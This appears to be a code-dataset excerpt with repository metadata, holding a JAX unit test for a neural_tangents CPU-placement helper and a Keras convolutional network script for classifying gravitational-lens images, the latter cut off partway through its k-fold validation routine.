refs/heads/master
| 2022-12-27T03:48:29.453417
| 2020-09-30T17:21:22
| 2020-10-01T00:44:19
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,958
|
py
|
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for `utils/predict.py`."""
from absl.testing import absltest
from jax import test_util as jtu
from jax.api import device_get
from jax.api import jit
from jax.config import config
from jax.lib import xla_bridge
import jax.numpy as np
import jax.random as random
from neural_tangents.utils import utils
config.parse_flags_with_absl()
config.update('jax_numpy_rank_promotion', 'raise')
class UtilsTest(jtu.JaxTestCase):
  """Unit tests for neural_tangents.utils helpers."""

  def testIsOnCPU(self):
    # utils.is_on_cpu must report True exactly for CPU-resident arrays,
    # for both float32 and float64 inputs.
    for dtype in [np.float32, np.float64]:
      with self.subTest(dtype=dtype):
        def x():
          # Array produced on the default backend (CPU or accelerator).
          return random.normal(random.PRNGKey(1), (2, 3), dtype)
        def x_cpu():
          # device_get pulls the result back to host memory.
          return device_get(random.normal(random.PRNGKey(1), (2, 3), dtype))
        x_jit = jit(x)
        # x_cpu_jit = jit(x_cpu)
        x_cpu_jit_cpu = jit(x_cpu, backend='cpu')
        self.assertTrue(utils.is_on_cpu(x_cpu()))
        # TODO(mattjj): re-enable this when device_put under jit works
        # self.assertTrue(utils.is_on_cpu(x_cpu_jit()))
        self.assertTrue(utils.is_on_cpu(x_cpu_jit_cpu()))
        # On a CPU-only backend everything lives on CPU; on accelerators the
        # default-backend arrays must not be reported as CPU-resident.
        if xla_bridge.get_backend().platform == 'cpu':
          self.assertTrue(utils.is_on_cpu(x()))
          self.assertTrue(utils.is_on_cpu(x_jit()))
        else:
          self.assertFalse(utils.is_on_cpu(x()))
          self.assertFalse(utils.is_on_cpu(x_jit()))
if __name__ == '__main__':
  absltest.main()  # delegate test discovery and running to absl
|
[
"romann@google.com"
] |
romann@google.com
|
e3f0fa8530d803d47671f975bfbbc686baaee7bb
|
73be09853a2a303597825a5fe765610eeebbc5ef
|
/ForGPU/KerasCnn5.py
|
f6163ee71736ad8085652a59616dc5a78c1d025c
|
[
"MIT"
] |
permissive
|
Annarien/GravitationalLenses
|
7375cded8a028f39b4426687f90b5d0f8ca92cde
|
c2606aacc62d2534fb199f5228dc21c0ea604251
|
refs/heads/main
| 2023-06-02T21:25:29.543234
| 2021-06-19T18:20:07
| 2021-06-19T18:20:07
| 341,883,049
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 55,630
|
py
|
"""
This is file performs the convolutional neural network algorithm, in which the k fold is performed as well.
The results were saved in a csv file.
"""
import os
import sys
import random
from datetime import datetime
import numpy as np
import tensorflow
from astropy.io import fits
from astropy.utils.data import get_pkg_data_filename
from matplotlib import pyplot as plt
from sklearn.metrics import confusion_matrix
from sklearn.model_selection import train_test_split, StratifiedKFold
from sklearn.utils import shuffle
from tensorflow.python.keras import Sequential
from tensorflow.python.keras.callbacks import ModelCheckpoint, EarlyStopping
from tensorflow.python.keras.layers.convolutional import Conv2D, MaxPooling2D
from tensorflow.python.keras.layers.core import Dense, Dropout, Flatten
from tensorflow.python.keras.models import Model
from tensorflow.python.keras.preprocessing.image import ImageDataGenerator
from tensorflow.python.keras.utils.vis_utils import plot_model
from tensorflow.python.keras.models import save_model
# added Adam opt for learning rate
from tensorflow.python.keras.optimizers import Adam
# from tensorflow.keras.optimizers import Adam
from tensorflow.python.keras import backend as K
from ExcelUtils import createExcelSheet, writeToFile
print(tensorflow.__version__)
now = datetime.now()
dt_string = now.strftime("%d_%m_%Y_%H_%M_%S")
print(dt_string)
excel_headers = []
excel_dictionary = []
excel_headers.append("Date and Time")
excel_dictionary.append(dt_string)
# Globals
makeNewCSVFile = True
max_num = sys.maxsize # Set to sys.maxsize when running entire data set
max_num_testing = sys.maxsize # Set to sys.maxsize when running entire data set
max_num_prediction = sys.maxsize # Set to sys.maxsize when running entire data set
validation_split = 0.2 # A float value between 0 and 1 that determines what percentage of the training
# data is used for validation.
k_fold_num = 5 # A number between 2 and 10 that determines how many times the k-fold classifier
# is trained.
epochs = 50 # A number that dictates how many iterations should be run to train the classifier
batch_size = 128 # The number of items batched together during training.
run_k_fold_validation = True # Set this to True if you want to run K-Fold validation as well.
input_shape = (100, 100, 3) # The shape of the images being learned & evaluated.
augmented_multiple = 2 # This uses data augmentation to generate x-many times as much data as there is on file.
use_augmented_data = True # Determines whether to use data augmentation or not.
patience_num = 5 # Used in the early stopping to determine how quick/slow to react.
use_early_stopping = True # Determines whether to use early stopping or not.
use_model_checkpoint = True # Determines whether the classifiers keeps track of the most accurate iteration of itself.
monitor_early_stopping = 'val_loss'
monitor_model_checkpoint = 'val_acc'
use_shuffle = True
learning_rate = 0.001
training_positive_path = 'Training/PositiveAll'
# training_positive_path = 'UnseenData/KnownLenses_training'
training_negative_path = 'Training/Negative'
testing_positive_path = 'Testing/PositiveAll'
testing_negative_path = 'Testing/Negative'
# unseen_known_file_path = 'UnseenData/Known131'
unseen_known_file_path_select = 'UnseenData/SelectingSimilarLensesToPositiveSimulated'
unseen_known_file_path_all = 'UnseenData/KnownLenses'
# Adding global parameters to excel
excel_headers.append("Max Training Num")
excel_dictionary.append(max_num)
excel_headers.append("Max Testing Num")
excel_dictionary.append(max_num_testing)
excel_headers.append("Max Prediction Num")
excel_dictionary.append(max_num_prediction)
excel_headers.append("Validation Split")
excel_dictionary.append(validation_split)
excel_headers.append("K fold Num")
excel_dictionary.append(k_fold_num)
excel_headers.append("Epochs")
excel_dictionary.append(epochs)
excel_headers.append("Batch Size")
excel_dictionary.append(batch_size)
excel_headers.append("Run K fold")
excel_dictionary.append(run_k_fold_validation)
excel_headers.append("Input Shape")
excel_dictionary.append(input_shape)
excel_headers.append("Augmented Multiple")
excel_dictionary.append(augmented_multiple)
excel_headers.append("Use Augmented Data")
excel_dictionary.append(use_augmented_data)
excel_headers.append("Patience")
excel_dictionary.append(patience_num)
excel_headers.append("Use Early Stopping")
excel_dictionary.append(use_early_stopping)
excel_headers.append("Use Model Checkpoint")
excel_dictionary.append(use_model_checkpoint)
excel_headers.append("Monitor Early Stopping")
excel_dictionary.append(monitor_early_stopping)
excel_headers.append("Monitor Model Checkpoint")
excel_dictionary.append(monitor_model_checkpoint)
excel_headers.append("Use Shuffle")
excel_dictionary.append(use_shuffle)
excel_headers.append("Learning Rate")
excel_dictionary.append(learning_rate)
if not os.path.exists('../Results/%s/' % dt_string):
os.mkdir('../Results/%s/' % dt_string)
# Helper methods
def getPositiveImages(images_dir, max_num, input_shape):
    """
    This gets the positively simulated images in the g, r and i bands.
    Args:
        images_dir(string):     This is the file path address of the positively simulated images.
        max_num(integer):       This is the number of sources of the positively simulated images to be used.
        input_shape(tuple):     This is the shape of the images.
    Returns:
        positive_images(numpy array):   This is the numpy array of the positively simulated images with the shape of
                                        (num of images, input_shape[0], input_shape[1], input_shape[2]) =
                                        (num_of_images, 100, 100, 3).
    """
    # NOTE(review): these path variables are only used locally; the 'global'
    # declaration looks unnecessary -- confirm nothing else reads them.
    global g_img_path, r_img_path, i_img_path
    for root, dirs, _ in os.walk(images_dir):
        num_of_images = min(max_num, len(dirs))
        # Buffer is built channels-first: (N, 3, 100, 100).
        positive_images = np.zeros([num_of_images, 3, 100, 100])
        index = 0
        print('image_dir: ' + str(images_dir))
        for folder in dirs:
            # The two supported source layouts name their FITS files differently.
            if images_dir == 'Training/PositiveAll':
                g_img_path = get_pkg_data_filename('%s/%s_g_norm.fits' % (os.path.join(root, folder), folder))
                r_img_path = get_pkg_data_filename('%s/%s_r_norm.fits' % (os.path.join(root, folder), folder))
                i_img_path = get_pkg_data_filename('%s/%s_i_norm.fits' % (os.path.join(root, folder), folder))
            elif images_dir == 'UnseenData/KnownLenses_training':
                g_img_path = get_pkg_data_filename('%s/g_norm.fits' % (os.path.join(root, folder)))
                r_img_path = get_pkg_data_filename('%s/r_norm.fits' % (os.path.join(root, folder)))
                i_img_path = get_pkg_data_filename('%s/i_norm.fits' % (os.path.join(root, folder)))
            # print('g_img_path: ' + str(g_img_path))
            # print('r_img_path: ' + str(r_img_path))
            # print('i_img_path: ' + str(i_img_path))
            # Crop each band to 100x100 and stack in g, r, i order.
            g_data = fits.open(g_img_path)[0].data[0:100, 0:100]
            r_data = fits.open(r_img_path)[0].data[0:100, 0:100]
            i_data = fits.open(i_img_path)[0].data[0:100, 0:100]
            img_data = [g_data, r_data, i_data]
            positive_images[index] = img_data
            index += 1
            if index >= num_of_images:
                break
    # NOTE(review): reshape (not transpose) reinterprets the (N, 3, 100, 100)
    # buffer as (N, 100, 100, 3); the band planes are not moved into the last
    # axis -- confirm this matches how the network was trained.
    return positive_images.reshape(num_of_images, input_shape[0], input_shape[1], input_shape[2])
def getNegativeImages(images_dir, max_num, input_shape):
    """
    This gets the negative images in the g, r and i bands.
    Args:
        images_dir(string):     This is the file path address of the negative images.
        max_num(integer):       This is the number of sources of the negative images to be used.
        input_shape(tuple):     This is the shape of the images.
    Returns:
        negative_images(numpy array):   This is the numpy array of the negative images with the shape of
                                        (num of images, input_shape[0], input_shape[1], input_shape[2]) =
                                        (num_of_images, 100, 100, 3).
    """
    for root, dirs, _ in os.walk(images_dir):
        num_of_images = min(max_num, len(dirs))
        # Buffer is built channels-first: (N, 3, 100, 100).
        negative_images = np.zeros([num_of_images, 3, 100, 100])
        index = 0
        for folder in dirs:
            g_img_path = get_pkg_data_filename('%s/g_norm.fits' % (os.path.join(root, folder)))
            r_img_path = get_pkg_data_filename('%s/r_norm.fits' % (os.path.join(root, folder)))
            i_img_path = get_pkg_data_filename('%s/i_norm.fits' % (os.path.join(root, folder)))
            # Crop each band to 100x100 and stack in g, r, i order.
            g_data = fits.open(g_img_path)[0].data[0:100, 0:100]
            r_data = fits.open(r_img_path)[0].data[0:100, 0:100]
            i_data = fits.open(i_img_path)[0].data[0:100, 0:100]
            img_data = [g_data, r_data, i_data]
            negative_images[index] = img_data
            index += 1
            if index >= num_of_images:
                break
    # NOTE(review): reshape (not transpose) reinterprets the channels-first
    # buffer as channels-last without moving the band planes -- confirm.
    return negative_images.reshape(num_of_images, input_shape[0], input_shape[1], input_shape[2])
def getUnseenData(images_dir, max_num, input_shape):
    """
    This gets the unseen images in the g, r and i bands containing the identified known lenses.
    Args:
        images_dir(string):     This is the file path address of the unseen images.
        max_num(integer):       This is the number of sources of the unseen images to be used.
        input_shape(tuple):     This is the shape of the images.
    Returns:
        des_tiles(dictionary):  This is the dictionary of the unseen images, keyed by source folder
                                name, each value shaped (input_shape[0], input_shape[1], input_shape[2]) =
                                (100, 100, 3).
    """
    des_tiles = {}
    for root, dirs, _ in os.walk(images_dir):
        num_of_images = min(max_num, len(dirs))
        index = 0
        for folder in dirs:
            g_img_path = get_pkg_data_filename('%s/g_norm.fits' % (os.path.join(root, folder)))
            r_img_path = get_pkg_data_filename('%s/r_norm.fits' % (os.path.join(root, folder)))
            i_img_path = get_pkg_data_filename('%s/i_norm.fits' % (os.path.join(root, folder)))
            # print(g_img_path)
            # Crop each band to 100x100.
            g_data = fits.open(g_img_path)[0].data[0:100, 0:100]
            # print(np.shape(g_data))
            r_data = fits.open(r_img_path)[0].data[0:100, 0:100]
            i_data = fits.open(i_img_path)[0].data[0:100, 0:100]
            # NOTE(review): reshape of the (3, 100, 100) stack to (100, 100, 3)
            # reinterprets memory rather than transposing -- confirm intended.
            img_data = np.array([g_data, r_data, i_data]).reshape(input_shape[0], input_shape[1], input_shape[2])
            des_tiles.update({folder: img_data})
            index += 1
            if index >= num_of_images:
                break
    return des_tiles
def makeImageSet(positive_images, negative_images=None, tile_names=None, shuffle_needed=use_shuffle):
    """
    This is used to create data set of images and labels, in which the positive and negative images are all
    combined and shuffled.
    Args:
        positive_images(numpy array):   This is the numpy array of the positively simulated images.
        negative_images(numpy array):   This is the numpy array of the negative images, this is set to a
                                        default of None.
        tile_names(list):               This is the dictionary of the unseen known lenses, this is set to a
                                        default of None.
        shuffle_needed(boolean):        This is a boolean value to determine whether or not shuffling of the given data
                                        sets is required.
    Returns:
        image_set(numpy array):         This is the image data set of numpy array of the combination positive
                                        and negative images.
        label_set(numpy array):         This is the label data set of numpy array of the combination positive
                                        and negative label.
        des_names_set(numpy array):     This is the des name data set of the known lenses and negative images used.
    """
    image_set = []
    label_set = []
    tile_name_set = []
    # Positive examples are labelled 1.
    if positive_images is not None:
        for index in range(0, len(positive_images)):
            image_set.append(positive_images[index])
            label_set.append(1)
            if tile_names is not None:
                tile_name_set.append(tile_names[index])
    # Negative examples are labelled 0.
    if negative_images is not None:
        for index in range(0, len(negative_images)):
            image_set.append(negative_images[index])
            label_set.append(0)
            if tile_names is not None:
                # NOTE(review): 'index' restarts at 0 here, so when both image
                # sets are passed with tile_names, negatives reuse the first
                # tile names -- confirm callers never hit this combination.
                tile_name_set.append(tile_names[index])
    # print("Label Set: " + str(label_set))
    # Shuffle images, labels (and names, when present) in lockstep.
    if shuffle_needed:
        if tile_names is not None:
            image_set, label_set, tile_name_set = shuffle(image_set, label_set, tile_name_set)
        else:
            image_set, label_set = shuffle(image_set, label_set)
    # print("Shuffled Label Set: " + str(label_set))
    return np.array(image_set), np.array(label_set), np.array(tile_name_set)
def buildClassifier(input_shape=(100, 100, 3)):
    """
    Build and compile the CNN used for the binary lens / non-lens classification.

    Architecture: six 'same'-padded ReLU convolution layers with filter counts
    doubling from 32 to 1024, interleaved with 2x2 max pooling and dropout,
    followed by a flatten and a single sigmoid output unit.

    (Two earlier experimental architectures that lived here as commented-out
    code have been removed; see version control history if they are needed.)

    Args:
        input_shape(tuple): This is the image shape of (100,100,3)
    Returns:
        classifier(sequential): This is the compiled sequential model.
    Saves:
        'model_plot.png': a diagram of the network layers.
    """
    # Initialising the CNN; `learning_rate` is a module-level hyperparameter.
    opt = Adam(lr=learning_rate)  # lr = learning rate
    classifier = Sequential()
    classifier.add(Conv2D(32, kernel_size=(3, 3), activation='relu', input_shape=input_shape, padding='same'))
    classifier.add(MaxPooling2D(pool_size=(2, 2), padding='same'))
    classifier.add(Dropout(0.5))  # added extra Dropout layer
    classifier.add(Conv2D(64, (3, 3), activation='relu', padding='same'))
    classifier.add(MaxPooling2D(pool_size=(2, 2), padding='same'))
    classifier.add(Conv2D(128, (3, 3), padding='same', activation='relu'))
    classifier.add(Dropout(0.5))  # added extra dropout layer
    classifier.add(Conv2D(256, (3, 3), activation='relu', padding='same'))
    classifier.add(MaxPooling2D(pool_size=(2, 2), padding='same'))
    classifier.add(Dropout(0.2))  # antes era 0.25
    # Adding a third convolutional stage
    # NOTE(review): MaxPooling2D(2, 2) passes strides=2 positionally, which
    # matches the default (strides=pool_size) — behaviour is unchanged.
    classifier.add(Conv2D(512, (3, 3), padding='same', activation='relu'))
    classifier.add(MaxPooling2D(2, 2))
    classifier.add(Conv2D(1024, (3, 3), activation='relu', padding='same'))
    classifier.add(MaxPooling2D(pool_size=(2, 2), padding='same'))
    classifier.add(Dropout(0.2))  # antes era 0.25
    # Step 3 - Flattening
    classifier.add(Flatten())
    # Step 4 - Full connection
    classifier.add(Dropout(0.2))
    classifier.add(Dense(units=1, activation='sigmoid'))
    classifier.summary()
    # Compiling the CNN for binary classification.
    classifier.compile(optimizer=opt,
                       loss='binary_crossentropy',
                       metrics=['accuracy'])
    plot_model(classifier, to_file='model_plot.png', show_shapes=True, show_layer_names=True)
    return classifier
def visualiseActivations(img_tensor, base_dir):
    """
    Make and save images of the activations as the selected image passes through
    the trained, module-level `classifier`.

    Args:
        img_tensor(numpy array): This is the numpy array of the selected image.
        base_dir(string): Directory the activation PNGs are written to.
    Saves:
        One PNG per inspected layer, named '<count>_Activation_<layer_name>.png'.
    """
    global predicted_class, size
    # Run prediction on that image.
    # NOTE(review): `predict_classes` was removed in newer Keras/TF versions;
    # confirm the pinned version still provides it.
    predicted_class = classifier.predict_classes(img_tensor, batch_size=10)
    print("Predicted class is: ", predicted_class)
    # Build a model exposing the outputs of the first 12 layers so the
    # intermediate feature maps can be visualised.
    layer_outputs = [layer.output for layer in classifier.layers[:12]]
    activation_model = Model(inputs=classifier.input, outputs=layer_outputs)
    activations = activation_model.predict(img_tensor)
    layer_names = []
    for layer in classifier.layers[:12]:
        layer_names.append(layer.name)
    images_per_row = 3
    count = 0
    for layer_name, layer_activation in zip(layer_names, activations):
        # layer_activation has shape (1, size, size, number_of_features);
        # tile the feature maps into a grid of `images_per_row` columns.
        number_of_features = layer_activation.shape[-1]
        size = layer_activation.shape[1]
        number_of_columns = number_of_features // images_per_row
        display_grid = np.zeros((size * number_of_columns, images_per_row * size))
        for col in range(number_of_columns):
            for row in range(images_per_row):
                channel_image = layer_activation[0, :, :, col * images_per_row + row]
                # Normalise each channel to mean 128 / std 64 and clip to
                # [0, 255] so it displays as an 8-bit image.
                channel_image -= channel_image.mean()
                channel_image /= channel_image.std()
                channel_image *= 64
                channel_image += 128
                channel_image = np.clip(channel_image, 0, 255).astype('uint8')
                display_grid[col * size: (col + 1) * size, row * size: (row + 1) * size] = channel_image
        scale = 1. / size
        activations_figure = plt.figure(figsize=(scale * display_grid.shape[1],
                                                 scale * display_grid.shape[0]))
        plt.title(layer_name)
        plt.grid(False)
        plt.imshow(display_grid, aspect='auto', cmap='viridis')
        activations_figure.savefig('%s/%s_Activation_%s.png' % (base_dir, count, layer_name))
        plt.close()
        count += 1
def usingCnnModel(training_data, training_labels, val_data, val_labels):
    """
    Build the CNN and fit it to the training data, validating on the validation set.

    Relies on module-level settings: `epochs`, `batch_size`,
    `monitor_model_checkpoint`, `monitor_early_stopping`, `patience_num`,
    `use_early_stopping` and `use_model_checkpoint`.

    Args:
        training_data(numpy arrays): This is the numpy array of the training data.
        training_labels(numpy arrays): This is the numpy array of the training labels.
        val_data(numpy arrays): This is the numpy array of the validation data.
        val_labels(numpy arrays): This is the numpy array of the validation labels.
    Returns:
        history(history): This is the training history of the classifier.
        classifier(sequential): This is the cnn model classifier fitted to the training data and labels.
    """
    # Keep the weights of the best epoch (by `monitor_model_checkpoint`) on disk.
    model_checkpoint = ModelCheckpoint(filepath="best_weights.hdf5",
                                       monitor=monitor_model_checkpoint,
                                       save_best_only=True)
    early_stopping = EarlyStopping(monitor=monitor_early_stopping, patience=patience_num)  # original patience =3
    classifier = buildClassifier()
    # Callbacks are optional and controlled by module-level flags.
    callbacks_array = []
    if use_early_stopping:
        callbacks_array.append(early_stopping)
    if use_model_checkpoint:
        callbacks_array.append(model_checkpoint)
    print(len(training_data))
    history = classifier.fit(training_data,
                             training_labels,
                             epochs=epochs,
                             validation_data=(val_data, val_labels),
                             callbacks=callbacks_array,
                             batch_size=batch_size
                             # steps_per_epoch=int(len(training_data) / batch_size),
                             )
    return history, classifier
def createAugmentedData(training_data, training_labels):
    """
    Create the augmented training data set.

    The original images are kept, and (`augmented_multiple` - 1) additional
    full-size augmented copies are drawn from a Keras ImageDataGenerator, so
    the returned set is `augmented_multiple` times the original size.

    Args:
        training_data(numpy arrays): This is the numpy array of the training data.
        training_labels(numpy arrays): This is the numpy array of the training labels.
    Returns:
        complete_training_data_set(numpy array): All training data, original plus augmented.
        complete_training_labels_set(numpy array): Matching labels.
    """
    complete_training_data_set = []
    complete_training_labels_set = []
    # Start with the unmodified originals.
    for data in training_data:
        complete_training_data_set.append(data)
    print("Complete Training Data: " + str(len(complete_training_data_set)))
    for label in training_labels:
        complete_training_labels_set.append(label)
    print("Complete Training Label: " + str(len(complete_training_labels_set)))
    # create augmented data: random rotations/shifts/flips plus feature-wise
    # centering and std-normalisation fitted on the original training data.
    data_augmented = ImageDataGenerator(featurewise_center=True,
                                        featurewise_std_normalization=True,
                                        rotation_range=90,
                                        width_shift_range=0.2,
                                        height_shift_range=0.2,
                                        horizontal_flip=True,
                                        vertical_flip=True)
    # (kept for reference: an earlier, milder augmentation configuration)
    # data_augmented = ImageDataGenerator(featurewise_center=False,
    #                                     featurewise_std_normalization=False,
    #                                     rotation_range=90,
    #                                     horizontal_flip=True,
    #                                     vertical_flip=True)
    data_augmented.fit(training_data)
    training_data_size = training_data.shape[0]
    aug_counter = 0
    # Each pass draws one batch the size of the whole training set.
    while aug_counter < (augmented_multiple - 1):
        iterator = data_augmented.flow(training_data, training_labels, batch_size=training_data_size)
        # iterator = data_augmented.flow(training_data, training_labels, batch_size=batch_size)
        augmented_data = iterator.next()
        for data in augmented_data[0]:
            complete_training_data_set.append(data)
        for label in augmented_data[1]:
            complete_training_labels_set.append(label)
        aug_counter += 1
    print("Size of All Training Data: " + str(len(complete_training_data_set)))
    print("Size of All Training Labels: " + str(len(complete_training_labels_set)))
    array_training_data = np.array(complete_training_data_set)
    array_training_labels = np.array(complete_training_labels_set)
    print("Shape of complete training data: " + str(array_training_data.shape))
    print("Shape of complete training labels: " + str(array_training_labels.shape))
    return np.array(complete_training_data_set), np.array(complete_training_labels_set)
def savePredictedLenses(des_names_array, predicted_class_probabilities, predicted_lenses_filepath, text_file_path):
    """
    Append the DES names of predicted lenses and non-lenses to a report file.

    Args:
        des_names_array(numpy array): DES names of the sources, aligned with
                                      the prediction array.
        predicted_class_probabilities(list): Predicted classes (1 = lens,
                                             0 = non-lens) per source.
        predicted_lenses_filepath(string): Directory that must exist for the
                                           report; created when missing.
        text_file_path(string): Path of the report text file (opened in
                                append mode).
    Returns:
        predicted_lenses(list): DES names classified as lenses.
        predicted_no_lenses(list): DES names classified as non-lenses.
    """
    # Split the names by predicted class in a single pass.
    predicted_lenses = []
    predicted_no_lenses = []
    for position, prediction in enumerate(predicted_class_probabilities):
        if prediction == 1:
            predicted_lenses.append(des_names_array[position])
        elif prediction == 0:
            predicted_no_lenses.append(des_names_array[position])
    if not os.path.exists(predicted_lenses_filepath):
        os.mkdir('%s/' % predicted_lenses_filepath)
    # Write the two sections of the report, preserving input order.
    text_file = open('%s' % text_file_path, "a+")
    text_file.write('\n')
    text_file.write('Predicted Lenses: \n')
    for des_name in predicted_lenses:
        text_file.write("%s \n " % des_name)
    text_file.write('\n')
    text_file.write('No Lenses Predicted: \n')
    for des_name in predicted_no_lenses:
        text_file.write("%s \n " % des_name)
    text_file.close()
    return predicted_lenses, predicted_no_lenses
def gettingTrueFalsePositiveNegatives(testing_data, testing_labels, text_file_path,
                                      predicted_lenses_filepath, kf_counter=0):
    """
    Compute and persist the confusion matrix of the module-level `classifier`
    on the given data set.

    Args:
        testing_data(numpy array): This is the unseen testing data numpy array.
        testing_labels(numpy array): This is the unseen testing label numpy array.
        text_file_path(string): Path of the text file the confusion matrix is
                                appended to.
        predicted_lenses_filepath(string): Directory the text file lives in;
                                           created when missing.
        kf_counter(int): Fold number recorded in the report (0 outside k-fold).
    Returns:
        confusion_matrix_array(list): [TN, FP, FN, TP] counts.
    Saves:
        Appends the matrix and the four counts to `text_file_path`.
    """
    if not os.path.exists(predicted_lenses_filepath):
        os.mkdir('%s/' % predicted_lenses_filepath)
    # NOTE(review): this always evaluates the module-level `classifier`, even
    # when called from inside the k-fold loop — confirm that is intended.
    predicted_data = classifier.predict_classes(testing_data)
    rounded_predicted_data = predicted_data.round()
    # labels=[0, 1] fixes the row/column order so ravel() below is [TN,FP,FN,TP].
    conf_matrix = confusion_matrix(testing_labels, rounded_predicted_data, labels=[0, 1])
    print(str(conf_matrix) + ' \n ')
    true_negative, false_positive, false_negative, true_positive = conf_matrix.ravel()
    print("True Positive: %s \n" % true_positive)
    print("False Negative: %s \n" % false_negative)
    print("False Positive: %s \n" % false_positive)
    print("True Negative: %s \n" % true_negative)
    text_file = open('%s' % text_file_path, "a+")
    text_file.write('\n')
    text_file.write('KFold Number: %s \n' % str(kf_counter))
    text_file.write('Predicted vs True Matrix: \n')
    text_file.write(str(conf_matrix) + " \n ")
    text_file.write("True Negative: %s \n" % str(true_negative))
    text_file.write("False Positive: %s \n" % str(false_positive))
    text_file.write("False Negative: %s \n" % str(false_negative))
    text_file.write("True Positive: %s \n" % str(true_positive))
    text_file.write("\n")
    text_file.close()
    confusion_matrix_array = [true_negative, false_positive, false_negative, true_positive]
    return confusion_matrix_array
def gettingKFoldConfusionMatrix(test_data, test_labels, unseen_images, unseen_labels, select_known_images,
                                select_known_labels, kf_counter):
    """
    Record the confusion matrices for one k-fold iteration on the three
    evaluation sets (testing, all unseen known lenses, selected known lenses).

    Args:
        test_data / test_labels(numpy arrays): unseen testing set.
        unseen_images / unseen_labels(numpy arrays): all unseen known lenses.
        select_known_images / select_known_labels(numpy arrays): selected unseen known lenses.
        kf_counter(int): current fold number, written into the reports.
    Returns:
        Three [TN, FP, FN, TP] lists, one per evaluation set.
    """
    # NOTE(review): some destination paths below contain trailing spaces
    # (e.g. '/TrainingTestingResults ') — kept byte-identical on purpose.
    test_confusion_matrix = gettingTrueFalsePositiveNegatives(test_data,
                                                              test_labels,
                                                              text_file_path='../Results/%s/TrainingTestingResults'
                                                                             '/KFold_PredictedMatrix.txt' % dt_string,
                                                              predicted_lenses_filepath='../Results/%s'
                                                                                        '/TrainingTestingResults '
                                                                                        % dt_string,
                                                              kf_counter=kf_counter)
    unseen_confusion_matrix = gettingTrueFalsePositiveNegatives(unseen_images,
                                                                unseen_labels,
                                                                text_file_path='../Results/%s/UnseenKnownLenses/'
                                                                               'KFold_LensesPredicted.txt' % dt_string,
                                                                predicted_lenses_filepath='../Results/%s'
                                                                                          '/UnseenKnownLenses/ '
                                                                                          % dt_string,
                                                                kf_counter=kf_counter)
    select_confusion_matrix = gettingTrueFalsePositiveNegatives(select_known_images,
                                                                select_known_labels,
                                                                text_file_path='../Results/%s/UnseenKnownLensesSelect/'
                                                                               'KFold_LensesPredicted.txt' % dt_string,
                                                                predicted_lenses_filepath='../Results/%s'
                                                                                          '/UnseenKnownLensesSelect/ '
                                                                                          % dt_string,
                                                                kf_counter=kf_counter)
    return test_confusion_matrix, unseen_confusion_matrix, select_confusion_matrix
def gettingRandomUnseenImage(filepath):
    """
    Load the normalised g, r and i FITS cut-outs of one source and stack them
    into a single image of module-level `input_shape`.

    Args:
        filepath(string): Directory containing g_norm.fits, r_norm.fits and
                          i_norm.fits for the source.
    Returns:
        img_data(numpy array): The stacked 100x100 three-band image.
    """
    band_arrays = []
    # One pass per photometric band instead of three copy-pasted stanzas.
    for band in ('g', 'r', 'i'):
        band_path = get_pkg_data_filename('%s/%s_norm.fits' % (filepath, band))
        band_arrays.append(fits.open(band_path)[0].data[0:100, 0:100])
    return np.array(band_arrays).reshape(input_shape[0], input_shape[1], input_shape[2])
def executeKFoldValidation(train_data, train_labels, val_data, val_labels, testing_data, testing_labels,
                           known_images, known_labels, known_des_names,
                           select_known_images, select_known_labels):
    """
    Run stratified k-fold cross validation; each fold trains a fresh model and
    is evaluated against the unseen testing set, all unseen known lenses and
    the selected unseen known lenses.

    Only runs when the module-level flag `run_k_fold_validation` is True; also
    relies on the module-level `k_fold_num`, `epochs`, `batch_size`,
    `excel_headers`/`excel_dictionary`, `dt_string` and
    `unseen_known_file_path_all`.

    Args:
        train_data / train_labels(numpy arrays): data split into the k folds.
        val_data / val_labels(numpy arrays): validation set used while fitting each fold.
        testing_data / testing_labels(numpy arrays): unseen testing set.
        known_images / known_labels(numpy arrays): all unseen known lenses.
        known_des_names(numpy array): DES names matching `known_images`.
        select_known_images / select_known_labels(numpy arrays): selected unseen known lenses.
    Saves:
        Per-fold confusion matrices and predicted-lens reports, an accuracy
        plot across folds, and a grid of example TP/FN images.
    """
    if run_k_fold_validation:
        print("In executingKFoldValidation")
        # this is doing it manually:
        kfold = StratifiedKFold(n_splits=k_fold_num, shuffle=True)
        test_scores_list = []
        test_loss_list = []
        unseen_scores_list = []
        unseen_loss_list = []
        select_unseen_scores_list = []
        select_unseen_loss_list = []
        test_matrix_list = []
        unseen_matrix_list = []
        select_matrix_list = []
        kf_counter = 0
        # fold number -> (DES name, image) of one random TP / FN per fold.
        true_positives = {}
        false_negatives = {}
        for train, test in kfold.split(train_data, train_labels):
            kf_counter += 1
            print('KFold #:', kf_counter)
            model = buildClassifier()
            # fit a fresh model on this fold's training split
            model.fit(train_data[train],
                      train_labels[train],
                      epochs=epochs,
                      validation_data=(val_data, val_labels),
                      batch_size=batch_size)
            test_scores = model.evaluate(testing_data, testing_labels, batch_size=batch_size)
            test_scores_list.append(test_scores[1])
            test_loss_list.append(test_scores[0])
            print("Test Score: " + str(test_scores_list))
            print("Test Loss: " + str(test_loss_list))
            unseen_scores = model.evaluate(known_images, known_labels, batch_size=batch_size)
            unseen_scores_list.append(unseen_scores[1])
            unseen_loss_list.append(unseen_scores[0])
            print("Unseen Score: " + str(unseen_scores_list))
            print("Unseen Loss: " + str(unseen_loss_list))
            select_scores = model.evaluate(select_known_images, select_known_labels, batch_size=batch_size)
            select_unseen_scores_list.append(select_scores[1])
            select_unseen_loss_list.append(select_scores[0])
            # show confusion matrix
            # NOTE(review): gettingKFoldConfusionMatrix still evaluates the
            # module-level `classifier`, not this fold's `model` — it would
            # need a model parameter to report per-fold matrices.
            test_confusion_matrix, unseen_confusion_matrix, select_confusion_matrix = gettingKFoldConfusionMatrix(
                testing_data,
                testing_labels, known_images,
                known_labels, select_known_images, select_known_labels, kf_counter)
            # BUG FIX: predictions previously used the module-level `classifier`
            # (trained before the k-fold loop) instead of this fold's `model`.
            probabilities_known_lenses = model.predict_classes(known_images, batch_size=batch_size)
            predicted_lens = np.count_nonzero(probabilities_known_lenses == 1)
